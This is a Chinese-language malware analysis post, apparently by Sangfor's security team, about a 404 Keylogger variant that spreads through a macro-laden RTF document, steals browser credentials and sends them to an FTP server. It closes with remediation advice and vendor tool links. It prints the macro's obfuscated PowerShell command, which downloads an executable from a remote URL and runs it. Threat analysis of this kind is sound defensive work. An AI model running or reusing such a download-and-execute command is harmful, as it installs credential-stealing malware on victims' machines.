404 Keylogger最新木馬,盜取受害者瀏覽器網站帳號和密碼

深信服千里目發表於2019-12-13

近日深信服安全團隊捕獲到一個最新的404 Keylogger木馬變種,通過OFFICE文件嵌入惡意巨集程式碼進行傳播,盜取受害者瀏覽器的網站帳號和密碼,深信服安全團隊對此樣本進行了詳細分析,並獲取到了黑客FTP伺服器的帳號和密碼,請大家提高安全意識,不要輕易開啟未知的郵件附件及文件等。


樣本是一個RTF文件,裡面巢狀了OLE物件,包含惡意巨集程式碼,如下所示:

404 Keylogger最新木馬,盜取受害者瀏覽器網站帳號和密碼


惡意巨集程式碼,會啟動PowerShell程式,從遠端伺服器上下載惡意程式,然後執行,相關引數,如下:

powershell (NEw-objEctsystem.net.wEBclIenT).DownLoAdfIlE( ”http://bit.ly/2P7EoT7” , ”$ENv:teMp\4235.exe” ) ; stARt ”$ENv:tEMP\4235.exe”


分析下載的惡意程式,使用NET語言進行開發,首先會獲取遠端伺服器地址:hxxps://paste.ee/r/RrkBF,如下所示:


404 Keylogger最新木馬,盜取受害者瀏覽器網站帳號和密碼

讀取遠端伺服器上的內容,如下所示:


404 Keylogger最新木馬,盜取受害者瀏覽器網站帳號和密碼

直接載入執行遠端伺服器上的指令碼,如下所示:


404 Keylogger最新木馬,盜取受害者瀏覽器網站帳號和密碼

解密去混淆遠端伺服器上的指令碼之後,同樣是一個NET編寫的程式,如下所示:


404 Keylogger最新木馬,盜取受害者瀏覽器網站帳號和密碼

該程式主要功能是鍵盤記錄,盜取受害者瀏覽器網站上的帳號和密碼,會結束受害者主機上的瀏覽器相關程式,如下所示:


404 Keylogger最新木馬,盜取受害者瀏覽器網站帳號和密碼

對抗殺軟,結束相關安全軟體程式,相關的安全軟體程式有一百多個,如下所示:


404 Keylogger最新木馬,盜取受害者瀏覽器網站帳號和密碼

將記錄的瀏覽器上網站,以及相關的帳號和密碼,然後傳送到黑客遠端FTPd伺服器,如下所示:


404 Keylogger最新木馬,盜取受害者瀏覽器網站帳號和密碼

該惡意程式還有截圖等操作,在分析該惡意程式的時候發現了黑客的FTP伺服器地址,以及帳號和密碼,登入進去,發現它已經盜取了部分受害者的主機資訊,如下所示:


404 Keylogger最新木馬,盜取受害者瀏覽器網站帳號和密碼

解決方案

病毒檢測查殺


1、深信服EDR產品、下一代防火牆及安全感知平臺等安全產品均具備病毒檢測能力,部署相關產品使用者可進行病毒檢測,如圖所示:


404 Keylogger最新木馬,盜取受害者瀏覽器網站帳號和密碼

2、深信服為廣大使用者免費提供查殺工具,可下載如下工具,進行檢測查殺。


64位系統下載連結:http://edr.sangfor.com.cn/tool/SfabAntiBot_X64.7z

 32位系統下載連結:http://edr.sangfor.com.cn/tool/SfabAntiBot_X86.7z

病毒防禦


1、及時給電腦打補丁,及時升級應用程式,修復漏洞。


2、不要點選來源不明的郵件附件,不從不明網站下載軟體。


3、深信服防火牆客戶,建議升級到AF805版本,並開啟人工智慧引擎Save,以達到最好的防禦效果。


4、使用深信服安全產品,接入安全雲腦,使用雲查服務可以即時檢測防禦新威脅。


5、深信服推出安全運營服務,通過以“人機共智”的服務模式幫助使用者快速擴充套件安全能力,針對此類威脅安全運營服務提供裝置安全裝置策略檢查、安全威脅檢查、相關漏洞檢查等服務,確保第一時間檢測風險以及更新策略,防範此類威脅。


最後,建議企業對全網進行一次安全檢查和防毒掃描,加強防護工作。推薦使用深信服安全感知+防火牆+EDR,對內網進行感知、查殺和防護。

相關文章